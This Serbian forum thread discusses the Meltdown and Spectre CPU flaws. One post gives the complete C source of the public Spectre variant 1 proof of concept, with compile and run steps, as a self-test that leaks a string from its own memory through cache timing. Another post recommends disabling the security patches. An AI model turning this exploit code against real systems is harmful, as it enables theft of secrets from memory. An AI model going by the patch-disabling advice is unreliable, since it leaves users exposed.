Meltdown & Spectre

[hedgehog]

Vidim nema ove teme na forumu, pa reko da otvorim.
Dakle za one koji ne znaju/nisu culi Meltdown i Spectre su ranjivosti na CPU koje mogu da omoguće pristup kernel memoriji računara. Ovo uključuje lozinke i druge osetljive informacije. Spectre ne samo da utiče na računare, već i na smartfone i smart home uređaje.
https://gizmodo.com/what-we-know-so-far-about-meltdown-and-spectre-the-dev-1821759062
Uglavnom suma sumarum je da su gotovo svi Intel i pojedini ARM procesori zahvaceni Meltdown i Spectre falinkom, dok su svi Intel, AMD i ARM procesori pogođeni sa Spectre. S tim sto u AMD tvrde da se to odnosi samo na Linux platformu koliko sam procitao do sad.
Microsoft je izbacio neki update koji bi trebalo da otkloni taj propust koliko-toliko, ali pazljivo s njim jer moze da s*ebe OS, zbog "nekompatibilnosti" sa pojedinim antivirus programima.
Meltdown and Spectre: How to Protect Your PC, Mac and Phone Now
Ono sto bi svako trebalo da odradi je update browser-a (Firefox je vec izbacio novu verziju vezanu za ovu problematiku 57.0.4.) kako bi se sprecilo da neki maliciozni softver na taj nacin pristupi rupama.

 

[Babadzonka]

Izvini ježO , ali mislim da je ovo pokrenuto vec Intelov "TLB"

 

[hedgehog]

Vidi stvarno je bilo vec nesto u vezi toga. Samo nije nazvano populanim imenom
A i ne odnosi se samo na Intel, tice se i ostalih proizvodjaca, bar jedna varijanta Spectre propusta.
Sve u svemu pod hitno nabaciti nove verzije pretrazivaca, jer je javascript jedan od nacina za koriscenje pomenutih rupa. To se osnosi na sve CPU sa Spectre problemom, znaci i AMD i ARM...

EDIT: Nek promeni neko naziv one teme na Topljenje i Avetinju

 

[Sam633]

Možete proveriti Vaš računar na Spectre propust, ako neko želi.

Treba nam (neki) GCC za Windows.

Ja sam uzeo TDM-GCC, koji možete naći ovde:

TDM-GCC MinGW Compiler

Tokom instalacije, možete uzeti sve što je preporučeno i biće u folderu C:\TDM-GCC-64.

Taj folder sam i izabrao za rad, Vi možete bilo koji drugi.

U njemu napravite novi tekstualni fajl. Desni klik -> New -> Text Document.

Otvorite ga i u njega iskopirajte sledeći sadržaj:

Spojler

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];

char * secret = "The Magic Words are Squeamish Ossifrage.";

unsigned int edx = 0;

uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */

void victim_function(size_t x) {
  if (x < array1_size) {
    temp &= array2[array1[x] * 512];
  }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (150) /* assume cache hit if time <= threshold */

int check_rdtscp() {
  __asm__ __volatile__ (
  "movl $0x80000001, %%eax\n"
  "cpuid\n"
  : "=d"(edx)
  :: "%eax", "%ebx", "%ecx"
  );
  return (edx&(1<<27));
}

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2], int has_rdtscp) {
  static int results[256];
  int tries, i, j, k, mix_i;
  unsigned int junk = 0;
  size_t training_x, x;
  register uint64_t time1, time2;
  volatile uint8_t * addr;
  volatile int z = 0;

  for (i = 0; i < 256; i++)
    results[i] = 0;
  for (tries = 999; tries > 0; tries--) {

    /* Flush array2[256*(0..255)] from cache */
    for (i = 0; i < 256; i++)
      _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

    /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
    training_x = tries % array1_size;
    for (j = 29; j >= 0; j--) {
      _mm_clflush( & array1_size);
      for (z = 0; z < 100; z++) {} /* Delay (can also mfence) */

      /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
      /* Avoid jumps in case those tip off the branch predictor */
      x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
      x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
      x = training_x ^ (x & (malicious_x ^ training_x));

      /* Call the victim! */
      victim_function(x);

    }

    /* Time reads. Order is lightly mixed up to prevent stride prediction */
    for (i = 0; i < 256; i++) {
      mix_i = ((i * 167) + 13) & 255;
      addr = & array2[mix_i * 512];
      if (has_rdtscp) {
        time1 = __rdtscp(& junk); /* READ TIMER */
        junk = * addr; /* MEMORY ACCESS TO TIME */
        time2 = __rdtscp(& junk); /* READ TIMER & COMPUTE ELAPSED TIME */
      } else {
        time1 = __rdtsc(); /* READ TIMER */
        junk = * addr; /* MEMORY ACCESS TO TIME */
        time2 = __rdtsc(); /* READ TIMER & COMPUTE ELAPSED TIME */
      }
      if (time2 - time1 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
        results[mix_i]++; /* cache hit - add +1 to score for this value */
    }

    /* Locate highest & second-highest results results tallies in j/k */
    j = k = -1;
    for (i = 0; i < 256; i++) {
      if (j < 0 || results[i] >= results[j]) {
        k = j;
        j = i;
      } else if (k < 0 || results[i] >= results[k]) {
        k = i;
      }
    }
    if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
      break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
  }
  results[0] ^= junk; /* use junk so code above won’t get optimized out*/
  value[0] = (uint8_t) j;
  score[0] = results[j];
  value[1] = (uint8_t) k;
  score[1] = results[k];
}

int main(int argc, const char * * argv) {
  size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
  int i, score[2], len = 40;
  uint8_t value[2], normalized[1];
  char * recovered = (char*)calloc(len + 1, sizeof(char*));
  const int has_rdtscp = check_rdtscp();

  for (i = 0; i < sizeof(array2); i++)
    array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
  if (argc == 3) {
    sscanf(argv[1], "%p", (void * * )( & malicious_x));
    malicious_x -= (size_t) array1; /* Convert input value into a pointer */
    sscanf(argv[2], "%d", & len);
  }

  printf("Reading %d bytes:\n", len);
  while (--len >= 0) {
    printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
    readMemoryByte(malicious_x++, value, score, has_rdtscp);
    printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
    normalized[0] = (value[0] > 31 && value[0] < 127) ? value[0] : (uint8_t)'?';
    recovered[strlen(recovered)] = normalized[0];
    printf("0x%02X=\'%c\' score=%d ", value[0], normalized[0], score[0]);
    if (score[1] > 0)
      printf("(second best: 0x%02X score=%d)", value[1], score[1]);
    printf("\n");
  }
  printf("\n");
  printf(" Original: %s\n", secret);
  printf("Recovered: %s\n", recovered);
  printf("\n");
  return (0);
}

Sačuvajte ga i promenite ime fajla u spectre.c.

Sad nam treba CMD. Pritisnite i držite levi Shift i istovremeno uradite desni klik. Dobićete opciju "Open command windows here". Ili jednostavno otvorite CMD i otiđite do Vašeg radnog foldera.

Kompajlirajte spectre.c sa:

gcc -s -msse2 spectre.c -o spectre

ili

gcc spectre.c -o spectre

Ako želite x86 verziju, odnosno 32bit-nu verziju, dodajte parametar:

-m32

Dobićete u folderu spectre.exe.

Pokrenite spectre.exe u već otvorenom CMD-u, sa:

spectre

ili:

spectre.exe

Javite rezultat.

Ima još jedan source, ali taj ću postaviti, ako ovaj postavljeni ne radi nekome.

Autor source-a napominje da je TDM-GCC malo buggy, pa ako mislite da može bolje, slobodno preporučite.

Probajte u Linux-u, macOS-u, Windows-u...

 

[Sam633]

Možda je lažna uzbuna.

Solace

Skyfall

 

[Sam633]

BranchScope:

PDF

As predicted, more branch prediction processor attacks are discovered

12 Concluding Remarks
In this paper we presented BranchScope — a new microarchitectural side-channel attack that exploits directional branch predictor to leak secret data. We demonstrated the attack on recent Intel processors. Our results showed that secret bits can be recovered by the attacker with very low error rate and without the knowledge of the internal predictor organization. Therefore, researchers and system developers have to consider BranchScope as a new security threat while designing future systems. We proposed several countermeasures to protect future systems from BranchScope.

The researchers looked only at Intel processors, using the attacks to leak information protected using Intel's SGX (Software Guard Extensions), a feature found on certain chips to carve out small sections of encrypted code and data such that even the operating system (or virtualization software) cannot access it. They also described ways the attack could be used against address space layout randomization and to infer data in encryption and image libraries.

 

[gx-x]

ima "[Guru3D]-InSpectre" aplikacija koja moze da proveri da li vam je bloatware protiv ovih navodnih opasnih propusta instaliran i racunar usporen i sa njime ih mozete iskljuciti. Ja iskreno sumnjam da ce neko doci u moj stan, zabosti USB i napasti mi racunar, ili ce me neko preko neta ciljati da mi njuska ram podatke. Tako da sam forsirane zakrpe iskljucio jer kad me za sve ove godine niko nije dirao, nece ni sad. A brzinu HDD-a i SSD-a primecujem vise nego napade na komp (koji se ne desavaju od ove dve vrste exploit-a).

 

[Dom1nat0R]

Izvor gospodin Vladimir Pejić